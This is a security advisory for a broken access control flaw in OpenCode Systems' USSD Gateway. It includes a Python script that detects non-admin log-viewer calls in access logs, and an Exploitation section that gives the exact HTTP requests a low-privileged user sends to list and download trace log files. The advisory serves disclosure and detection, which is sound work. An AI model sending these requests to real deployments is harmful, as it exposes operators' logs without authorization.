# [CVE-2025-65239] USSD Gateway Broken Access Control - Logs

## Description

Broken Access Control in the [USSD Gateway](https://opencode.com/ussi-gateway-function) application offered by [OpenCode Systems](https://opencode.com/) allows a low-privileged user to enumerate and read all trace/error log files, a function that is supposed to be restricted to admin accounts. \
<https://www.cve.org/CVERecord?id=CVE-2025-65239>

## Application Details

* **Name**: USSD Gateway
* **Vendor**: OpenCode Systems
* **Version**: OC Release 5 - Version 6.13.11

## Technical Details

* **Vulnerable Endpoint "All files"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1`
* **Vulnerable Endpoint "Specific file"**: `/occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log`
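Both endpoints share the same `w=ocussdgw&op=LogsViewer` prefix and differ only in `op_func`, which makes them easy to pick out of web-server access logs. The script below is an added example for defenders, not part of the advisory or the vendor's product: it parses access-log lines, recognises calls to the log viewer, extracts the server name and path carried in `op_param`, and flags every call whose session does not map to an admin role. The log format (combined format with a trailing `sid=` field) and the session-to-role mapping are constructed assumptions; in a real deployment the role would come from the panel's session store or audit log.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed sample access-log lines (Apache combined format plus a trailing
# session-id field). These are not from the advisory; the first two model the
# low-privileged session calling ListFiles and GetFile, the third an admin.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2025:10:00:01 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2" 200 5120 sid=sess-lowpriv
10.0.0.5 - - [10/Jan/2025:10:00:09 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace_2025.log HTTP/2" 200 88210 sid=sess-lowpriv
10.0.0.9 - - [10/Jan/2025:10:01:00 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59 HTTP/2" 200 5120 sid=sess-admin
10.0.0.7 - - [10/Jan/2025:10:02:00 +0000] "GET /occontrolpanel/index.php?w=ocussdgw&op=Dashboard HTTP/2" 200 1024 sid=sess-lowpriv
"""

# Constructed session -> role mapping (assumption: taken from the panel's
# session store or audit log at investigation time).
SESSION_ROLES = {"sess-admin": "admin", "sess-lowpriv": "operator"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ sid=(?P<sid>\S+)$'
)

# The two op_func values the advisory identifies as reachable by non-admins.
LOG_VIEWER_FUNCS = {"ListFiles", "GetFile"}
PANEL_PATH = "/occontrolpanel/index.php"


def parse_line(line):
    """Parse one access-log line into a dict with path and query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    params = {}
    # Split on '&' only: op_param legitimately contains ';' as a field separator,
    # so the generic parse_qs behaviour of older Pythons would mangle it.
    for pair in url.query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params[unquote(key)] = unquote(value)
    rec["path"] = url.path
    rec["params"] = params
    return rec


def is_logs_viewer_call(rec):
    """True when the request targets the LogsViewer ListFiles/GetFile functions."""
    p = rec["params"]
    return (rec["path"] == PANEL_PATH
            and p.get("w") == "ocussdgw"
            and p.get("op") == "LogsViewer"
            and p.get("op_func") in LOG_VIEWER_FUNCS)


def split_op_param(op_param):
    """op_param is 'SERVER-NAME;<path>[;<count>]' in the advisory's requests."""
    parts = op_param.split(";")
    server = parts[0] if parts else ""
    path = parts[1] if len(parts) > 1 else ""
    return server, path


def find_unauthorized_log_access(log_text, session_roles):
    """Return one finding per LogsViewer call made by a session that is not admin."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_logs_viewer_call(rec):
            continue
        role = session_roles.get(rec["sid"], "unknown")
        if role == "admin":
            continue
        server, path = split_op_param(rec["params"].get("op_param", ""))
        findings.append({
            "ts": rec["ts"], "ip": rec["ip"], "sid": rec["sid"], "role": role,
            "op_func": rec["params"]["op_func"], "server": server,
            "path": path, "status": int(rec["status"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_unauthorized_log_access(SAMPLE_LOG, SESSION_ROLES):
        print(f"{f['ts']} {f['ip']} sid={f['sid']} role={f['role']} "
              f"{f['op_func']} {f['server']}:{f['path']} -> {f['status']}")
```

A `status` of 200 on a flagged line is the signal that the server actually served the listing or file; a 403 on the same request after patching is what a retest should show. Sessions missing from the role map are reported as `unknown` rather than silently skipped, so an incomplete mapping errs toward review.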

## Exploitation

The vulnerability allows a low-privileged user to enumerate the trace and error log files exactly as an admin user would.

From the low-privileged user's session, send the following request:

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=ListFiles&op_param=SERVER-NAME;/aux1/ocussd/trace/;59&op_construct_param=1 HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

```http
HTTP/2 200 OK
Cache-Control: private-control
Pragma: no-cache
[...]

callback ( '<TABLE width="100%" border=0 cellpadding=2 cellspacing=0 align=center> <TR><TD width=100% valign=top align=right> <TABLE width="100%" border=0 cellpadding=2 cellspacing=2 height=30 class=txt> <TR><TD valign="top" align=left width=70%>Directory: <b>/aux1/ocussd/trace/</b></TD> <TD valign="top" width=30% align=right class=txt><b>Server: SERVER-NAME</b></TD></TR> </table></td></TR> <tr><td align=left><p> <table width="100%" border=0 cellpadding=2 cellspacing=2 class=txt align=left><tr class="tablehdr" style="height: 17px;"> <td class="txt_head" style="width: 40%; text-align: center; white-space: nowrap;">File Name</td><td class="txt_head" style="width: 20%; text-align: center; white-space: nowrap;">Date</td><td class="txt_head" style="width: 10%; text-align: center; white-space: [...]

[...]
```

A specific file from that listing can then be retrieved with the following request:

```http
GET /occontrolpanel/index.php?w=ocussdgw&op=LogsViewer&op_func=GetFile&op_param=SERVER-NAME;/aux1/ocussd/trace/trace[...].log HTTP/2
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:144.0) Gecko/20100101 Firefox/144.0
Cookie: OCPANEL-SESSIONID=4a[...]os0; openid-state=b10[...]12%3A%22openid-state%22%3B[...]B%7D; _csrf=f0db[...]%3B%7D
[...]
```

